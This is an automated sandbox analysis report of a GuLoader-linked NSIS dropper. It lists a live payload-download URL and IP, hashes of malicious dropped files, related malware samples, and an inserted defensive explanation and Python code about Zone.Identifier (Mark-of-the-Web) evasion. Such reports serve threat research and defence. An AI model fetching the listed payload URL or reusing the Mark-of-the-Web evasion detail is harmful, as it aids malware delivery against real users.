https://contoso.com/Icon | powershell.exe, 00000002.00000002.76785949957.000000000612A000.00000004.00000800.00020000.00000000.sdmp
http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
http://www.quovadis.bm0 | powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp
http://nsis.sf.net/NSIS_ErrorError | PO Tournefortian2453525525235235623425523235.exe, 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp; PO Tournefortian2453525525235235623425523235.exe, 00000000.00000000.76378317578.000000000040A000.00000008.00000001.01000000.00000003.sdmp
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD | Sammentrykket.exe, 00000004.00000001.76671061814.0000000000626000.00000020.00000001.01000000.00000008.sdmp
https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000002.00000002.76780432500.000000000321D000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77039711491.00000000048E2000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77136216434.00000000048E2000.00000004.00000020.00020000.00000000.sdmp; Sammentrykket.exe, 00000004.00000003.77135468668.00000000048E2000.00000004.00000020.00020000.00000000.sdmp
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.76782450843.00000000050C1000.00000004.00000800.00020000.00000000.sdmp
http://www.gopher.ftp://ftp. | Sammentrykket.exe, 00000004.00000001.76671061814.0000000000649000.00000020.00000001.01000000.00000008.sdmp
http://www.apache.org/licenses/LICENSE-2.0.html4 | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.76782450843.0000000005217000.00000004.00000800.00020000.00000000.sdmp
https://villa-ventura.com/FPkXcnPDrjTal168.binwt? | Sammentrykket.exe, 00000004.00000002.77592493794.0000000004868000.00000004.00000020.00020000.00000000.sdmp
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.90.59.130 | villa-ventura.com | Portugal | 9186 | ONILisbonPortugalPT | false
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1483268
          Start date and time:2024-07-26 23:53:11 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 16m 29s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
          Run name:Suspected Instruction Hammering
Number of new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:PO Tournefortian2453525525235235623425523235.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@7/17@1/1
          EGA Information:
          • Successful, ratio: 66.7%
          HCA Information:
          • Successful, ratio: 68%
          • Number of executed functions: 82
          • Number of non-executed functions: 88
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.189.173.21
          • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 6252 because it is empty
• Not all processes were analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: PO Tournefortian2453525525235235623425523235.exe
          No simulations
Context: samples sharing indicators with this analysis

IPs
Match: 185.90.59.130
Associated Sample Name / URL | Detection | Threat Name
IMG88957937579577593957937593756295Jimpy.exe | malicious | GuLoader
Statement 06_24.vbe | malicious | GuLoader

Domains
Match: villa-ventura.com
Associated Sample Name / URL | Detection | Threat Name | Context
IMG88957937579577593957937593756295Jimpy.exe | malicious | GuLoader | 185.90.59.130
Statement 06_24.vbe | malicious | GuLoader | 185.90.59.130

ASNs
Match: ONILisbonPortugalPT
Associated Sample Name / URL | Detection | Threat Name | Context
IMG88957937579577593957937593756295Jimpy.exe | malicious | GuLoader | 185.90.59.130
92.249.48.47-skid.x86_64-2024-07-20T09_04_18.elf | malicious | Mirai, Moobot | 213.58.16.116
https://ipfs.io/ipfs/bafkreib3ke46wqvmxf2l6dmbd4zt33hp3xlqnasggl7xjjk44d2jusjsvq#emacom-me@eem.pt | malicious | HTMLPhisher | 213.58.174.94
AAMwAy8pB7.elf | malicious | Mirai, Moobot | 213.58.144.23
Statement 06_24.vbe | malicious | GuLoader | 185.90.59.130
5klOcqqL2D.elf | malicious | Mirai | 213.58.16.125
T57QiayIem.elf | malicious | Unknown | 213.58.5.233
1rA2CJx2rg.elf | malicious | Mirai, Moobot | 213.58.5.209
0t102oBJAv.elf | malicious | Mirai | 213.58.107.92
2U7qDYujmP.elf | malicious | Mirai, Gafgyt | 185.90.59.90

JA3 fingerprints
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
setup.exe | malicious | Amadey | 185.90.59.130
setup.exe | malicious | Amadey, SmokeLoader | 185.90.59.130
file.exe | malicious | Vidar | 185.90.59.130
1lKbb2hF7fYToopfpmEvlyRN.exe | malicious | LummaC, Vidar | 185.90.59.130
file.exe | malicious | Vidar | 185.90.59.130
Monetary_Funding_Sheet_2024.js | malicious | WSHRAT | 185.90.59.130
IRqsWvBBMc.exe | malicious | Amadey, Vidar | 185.90.59.130
88z6JBPo00.exe | malicious | Unknown | 185.90.59.130
fJDG7S5OD7.exe | malicious | Unknown | 185.90.59.130
Ku8UpPuzaa.exe | malicious | Unknown | 185.90.59.130

Dropped files
No context
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):1.0472165698493376
              Encrypted:false
              SSDEEP:96:N4FhcA2HsSn7om7Jf4vXIxcQhc6ncEOcw3z+HbHgSPB6HeaykJzH0srooSOyPrxN:GzcA2Hsm/j0MjW43uouDu76ifAIO8g
              MD5:0574D4BF3B19C82ED766B356EBA8968D
              SHA1:31BB5240ABBBF57C0529396007005F45056E4824
              SHA-256:E37281A276D1679B58DBDA9579C816D52A3F9DE8EA6A87C72849491A15B664E2
              SHA-512:88A42D7C1CA84BDD2EC596FD940834D7563E37A2F368E15F218E52C9B4703841A2D33BAFC455874A8654B5526C80421C7FA43A8FD8EEB70D510AB13459AB5ACA
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.5.0.4.6.0.0.3.8.6.8.9.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.5.0.4.6.0.0.7.4.6.1.9.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.6.4.4.a.7.e.-.c.a.9.6.-.4.b.2.b.-.b.9.f.a.-.9.d.c.f.c.5.0.d.c.c.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.a.8.6.b.f.1.-.7.b.e.a.-.4.e.1.c.-.9.c.1.4.-.8.5.9.a.9.0.5.e.c.e.2.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.a.m.m.e.n.t.r.y.k.k.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.d.4.-.0.0.0.1.-.0.0.4.1.-.c.f.b.1.-.7.7.8.f.a.6.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.4.3.3.b.c.5.f.8.6.b.3.4.e.2.e.a.1.b.5.8.4.b.f.1.a.0.f.3.6.e.0.0.0.0.0.9.0.4.!.0.0.0.0.8.c.d.f.a.6.0.c.6.b.3.f.2.5.c.7.d.4.8.7.5.3.e.5.0.c.2.9.8.b.7.4.6.c.3.3.8.6.d.e.!.S.a.m.m.e.n.t.r.y.k.k.e.t...e.x.e.....T.a.r.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 21:56:40 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):115688
              Entropy (8bit):1.9759978965419622
              Encrypted:false
              SSDEEP:384:7CuT14D0gGzslkHUvhRU65CeFKTPi7QO5iw4IvSxnaQL:u84D0jAqUvj5pAwYwP61fL
              MD5:5CBCCCFAC424ED8C06D6340FB6EB0B40
              SHA1:5C7916D45742828D7B7AA087992B2F33935E2C3C
              SHA-256:43BCF5FF9FA0EE8DE370A685692D2A442BBE927451DD8304EC8ADA9BF8B9E161
              SHA-512:228C03B1D553FAB92C55C7F0572D19F2FEB772A0FA9467F25B47A6DC024BC21F9375BB6C0B498C72DAB086186E228FAA54918E4A07374FEAF1976037DC5CAB7B
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ..........f.........................................N..........T.......8...........T............I...z...........#...........%..............................................................................bJ......8&......GenuineIntel...........T...........^..f/............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6362
              Entropy (8bit):3.725171431225654
              Encrypted:false
              SSDEEP:96:R7IU6o7lZt3i6c6hFYYCqOvzcuujulAtpaMQUG89bZZsfAvTm:R9l7lZNi6c6hFYZru7pDG89bZZsfYTm
              MD5:C8050F0AAA30699748802287100ED561
              SHA1:64CA7593592F5B8185601431113DA97D8338637F
              SHA-256:51FA7247360A7D7B215B9E42B2D368E69FE518D1B9D65173BBC0C25B0E22A93C
              SHA-512:002837E22873677C3931068A440AF5E816933273DDD456FFA6A78659CFD0A074A115918DA2AA431E43FC2ADB5622A55EB2991D22C367C082AFB44041699A9940
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.7.6.<./.P.i.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4787
              Entropy (8bit):4.517175852646517
              Encrypted:false
              SSDEEP:48:cvIwwtl8zsve702I7VFJ5WS2Cfjk/ms3rm8M4Ju/OqFN+q8gbOhRTeLKVEVld:uILfG7GySPfC5JQJTgeLQEVld
              MD5:1C1DE4679B9F2733347EC9B13012B608
              SHA1:E54AA1E50B39873EE8C130DF6D4E89ACF12E0F9D
              SHA-256:2C10C48FA6B9F4700A2528A3D2B4B31023B3909E9455A2BBA3BB55AD2BB42545
              SHA-512:C2072F552FDC59EFFF3C15B10AD96BD8DE7A95DEF17694D869EB710CFDAA012923A2B584AED0993555D2A454B62C200DAB2F0CCAD1659EDE15BB6985051D3B8B
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222772268" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):8003
              Entropy (8bit):4.840877972214509
              Encrypted:false
              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
              MD5:106D01F562D751E62B702803895E93E0
              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):876348
              Entropy (8bit):6.160427481450352
              Encrypted:false
              SSDEEP:12288:R3IpD7+TUoYhjjPDU6dK7UVEnNH8nUg1EbV3O9XqOqLI4VpStZB:R3IUwHhjjPVdK7UVEp8nU6C2qOaUB
              MD5:D332BCAA3C61494B774F49BF3E716C21
              SHA1:8CDFA60C6B3F25C7D48753E50C298B746C3386DE
              SHA-256:D61208C85CE83C279DD87495F0DFC1CF5C345D2BF3A6E739279DCF188E19B21D
              SHA-512:40A405252934E0ECE7E24514BF041674C84559D94F0791183C77268E154387AC8C452838237C33F55434A3EB04C8F47E818F9D7172CC5295EF9AF86E92F80942
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 29%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................C...........@..........................................P<..@...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....@...P<..B..................@..@................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
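The Zone.Identifier stream above is the one powershell.exe writes next to the dropped Sammentrykket.exe, and its ZoneId is 0 (Local Machine zone), so the dropped executable carries no Mark-of-the-Web and SmartScreen will not evaluate it before it runs. The Python below is an added example, not code from the Joe Sandbox report: it recomputes the per-file figures the report prints for every dropped file (size, 8-bit Shannon entropy, MD5/SHA-1/SHA-256/SHA-512) and parses a Zone.Identifier stream into its zone. The sample bytes are constructed from the report's description of the stream (26 bytes, ASCII with CRLF terminators, preview "[ZoneTransfer]....ZoneId=0"); where the four non-printable bytes sit is an assumption, which does not affect the entropy (it depends only on byte frequencies and reproduces the report's 3.95006...) but does affect the digests, so those are not compared with the report. The read_zone_identifier helper is a hypothetical convenience that only works on NTFS under Windows.

```python
"""Recompute dropped-file metrics from a sandbox report and interpret a
Zone.Identifier (Mark-of-the-Web) stream.

Added example, not part of the Joe Sandbox report.
"""
import hashlib
import math
from collections import Counter

# Constructed sample: same printable content and length (26 bytes) as the
# dropped Sammentrykket.exe:Zone.Identifier stream in the report. The
# position of the CR/LF bytes is an assumption.
ZONE_IDENTIFIER_SAMPLE = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# URL security zone IDs used by the Mark-of-the-Web (urlmon URLZONE_* values)
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the report's "Entropy (8bit)" figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_metrics(data: bytes) -> dict:
    """Size, entropy and the four digests the report prints for each dropped file."""
    return {
        "size": len(data),
        "entropy": shannon_entropy(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def parse_zone_identifier(data: bytes) -> dict:
    """Parse the INI-style [ZoneTransfer] section of a Zone.Identifier stream.

    Only ZoneId 3 (Internet) and 4 (Restricted Sites) make SmartScreen and
    Office Protected View treat the file as untrusted; 0 to 2 behave as if no
    Mark-of-the-Web were present, which is what the dropped file above has.
    """
    fields = {}
    in_section = False
    for raw in data.decode("ascii", errors="replace").splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "fields": fields,
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown"),
        "motw_present": zone_id in (3, 4),
    }


def read_zone_identifier(path: str) -> bytes:
    """Hypothetical helper: read a file's Zone.Identifier alternate data stream (NTFS, Windows only)."""
    with open(path + ":Zone.Identifier", "rb") as stream:
        return stream.read()


if __name__ == "__main__":
    m = file_metrics(ZONE_IDENTIFIER_SAMPLE)
    print(f"size={m['size']} entropy={m['entropy']:.15f} sha256={m['sha256']}")
    z = parse_zone_identifier(ZONE_IDENTIFIER_SAMPLE)
    print(f"ZoneId={z['zone_id']} ({z['zone_name']}); Mark-of-the-Web present: {z['motw_present']}")
```

When hunting for this behaviour on an endpoint, the check that matters is not whether a Zone.Identifier stream exists but what it says: a freshly written executable whose stream reports ZoneId=0, written by a scripting host rather than a browser or mail client, is the pattern seen in this report.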
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):362225
              Entropy (8bit):7.73594534052683
              Encrypted:false
              SSDEEP:6144:c4fCYSs/2+k9xzT7FIAkPDqKvjt4TWP13IljMnnp6BtKovoApMpuT7p3ocVV:XgbznSdus+OIl6n0BtKogApMkT7pnV
              MD5:BD9481DFBA36E80E3106B60BDE4E13D4
              SHA1:A313DBA340750E640CB618F6E867C9B1760C3AE3
              SHA-256:CC344F3AC0C321E5EF6178667B2639EE83331ACD77A77D2D9792F00590E24C5B
              SHA-512:F1F418B79A6F24A062CF6710EC801CADAD5FAA826F393BEC9B90E91FFE6E44E2C06A4CA3101FF3B69BE9FE1442B0B4ED1A57C2FFA0FD6BA5FC3B94CECA14E363
              Malicious:false
              Preview:.........................tt.XXXXX....i.^.....\\...................}.........zzz..............uu..............{{............gg..''..................W...........5555..............JJJJ............E.............44..........FF..................................~~~.. ............''''......................@@..J....VVV....FF.|...M......O..cccc..................===...................~~.6...[..............................................-............7....i...,........4.........................................\.).UUUUU......./.........W....''........sss................q............J........FFF..............s.^..............##....^......................L............................,.................k............................... .&..........................hh.....kk.........4.).........V...........m.......M..@.FF...........QQ................:.............XX..........Y..............--..........=..}}}}......................ddd.l...<......./////.......SSSSS..........JJJJ......44....sssss...........
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:data
              Category:dropped
              Size (bytes):8063
              Entropy (8bit):4.898953775891207
              Encrypted:false
              SSDEEP:192:6Ua/xFXnmw2LeONEvvX/lkyRNcbsI1r+SKIxJV:FaZF3mw2SOqX7RNcbNUSKi
              MD5:462D92BFCEE44C020E882B3F4B66103D
              SHA1:0E1CA37EE507ECB03CBEE900435ED253FD73539A
              SHA-256:59710C9794FA3E4454960EE892E767414D4A26A009B4B27497DE25F91DCCE891
              SHA-512:478254CA1FD8F09DDC7BD64FD17FBFA259667F9C479E3AF94D3FD3D907B967FA31F22FED568ADFD052BBD8AF2C9EEF100D38E0E6AC3079203B2AF6066CED7CF6
              Malicious:false
              Preview:....^g...q...+...j...:.......X.`...........D.SP......-..k.....x.e...p.Z......^.............L...S.......5.v...6.......q.G.........T.b....L.9.+0..|..........................1...............h...&...<...@U..`....Hy...J...j..l.W.:..............M.............}..I.......|..)....'.m.q..e...i...7....v.........+B;..m......c......................`...zO..............n...............)..Q......y........K.o....t3_..U...G..8....9....W...y...4..../...... ].U.....%..0.|.......p..R.9JM..b.............F........'....Y...B...............b#....e._*.....k.>...x.....................M...g..............S..............Z...H..F_!..;.........y...r.....:....Ay.-.}U..H..................VdX..7x.z....V..n.1....H..6..............|......D....c.....:.3.......................G......%.i....G..9..w..p..............qK...._......V.N........:..).a.<.../...............d.t................>.................u:..>.....m.......n.k....................W...........6....6...........|.4`..a........6............-m............
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):426
              Entropy (8bit):4.234228654602146
              Encrypted:false
              SSDEEP:12:vWXZ1X/FWUbJLCtXGDoVn39MXF0ZJM9m5Qp19bBn:vC1vFb8kDoFID9mar9bB
              MD5:8719B83341B7CB79BAF1ACDD7C9F87E7
              SHA1:D83B011736A19BBB94DFC7CCBE0A467FC0CA11CD
              SHA-256:09B74E6AD781A94D787A71169BA8FF7B2F6878AEF837500A1A5C8C49FE6EDAB9
              SHA-512:C37F6E4FCEA813C4A0915B4CD7EE1DDFD1AF7A7E1024E27D81C3F3B0730EC68F082D08117098B988B142F6E7683BE60E3972965F34A1230F80D84636C1B9F60A
              Malicious:false
              Preview:stvregnet nitzhe rivalinden.sophism demarcated telegraphers mariposas unevasiveness spheration universalist forblffelsen martnet..blunket mimer tpper antigene projekterings erasing calyptrogen cirsectomies nondeterminism dasiphora..fngselsvsenernes asjas formulistic ctenodipterini newel annotating,malplaceres metamerized inrighted semiplumaceous accipient customed regionaliserende.nomopelmous rhagiocrin nskebarn brndoffer,
              Process:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              File Type:ASCII text, with very long lines (51991), with no line terminators
              Category:dropped
              Size (bytes):51991
              Entropy (8bit):5.3823418456115
              Encrypted:false
              SSDEEP:1536:+jqyk5qHicBZSSgoYpRKB0z07MugCVZ1piAQ:+jq5qPBEogEw0pL7FQ
              MD5:29746F3C54388A9F4917E4BE34F35B22
              SHA1:1C8099CED377BCCBA4F56B6E946993BD3F9E8174
              SHA-256:4CAA1D9B0C1A2A8C5B4357ED868A0B15CAAB2769EF85D72448A602E55DE57358
              SHA-512:A02DF71E19AFB0E790B5CD28FB2CC0622236AA3F30CA52D02B73028985DF4B4560EEB91FDCA54B80DF23114751DC121348C1D18DB61A053D36C7FBE3D0B2AF40
              Malicious:true
